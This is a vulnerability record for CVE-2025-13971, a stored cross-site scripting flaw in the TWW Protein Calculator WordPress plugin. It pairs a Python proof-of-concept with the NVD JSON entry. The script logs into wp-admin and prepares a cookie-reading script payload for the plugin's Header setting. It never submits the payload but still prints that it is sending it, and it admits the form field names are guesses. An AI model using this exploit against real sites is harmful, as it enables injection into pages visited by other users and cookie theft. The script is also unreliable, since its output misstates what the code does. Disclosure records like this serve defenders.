CVE-2025-13971

# CVE-2025-13971 PoC - TWW Protein Calculator Stored XSS # Affected: TWW Protein Calculator plugin <= 1.0.24 for WordPress import requests from bs4 import BeautifulSoup TARGET_URL = "http://target-wordpress-site.com" USERNAME = "admin" PASSWORD = "admin_password" session = requests.Session() # Step 1: Login to WordPress admin login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Navigate to plugin settings page settings_url = f"{TARGET_URL}/wp-admin/admin.php?page=twwc-protein-settings" response = session.get(settings_url) # Step 3: Inject XSS payload in Header setting # Payload: <script>alert(document.cookie)</script> xss_payload = '<script>alert(document.cookie)</script>' settings_data = { "twwc_header": xss_payload, "submit": "Save Changes" } # Note: Actual form action and field names need to be identified from the plugin # This PoC demonstrates the attack vector, actual implementation varies print(f"[*] Sending XSS payload: {xss_payload}") print(f"[*] Target: {settings_url}") print("[*] Payload will execute when any user views pages using the plugin")

{"cve": {"id": "CVE-2025-13971", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:45.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TWW Protein Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Header' setting in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-compact.php#L19", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-large.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-compact.php#L19", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-large.php#L32", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b57749db-0a47-44f8-8607-d0d962c5ced2?source=cve", "source": "[email protected]"}]}}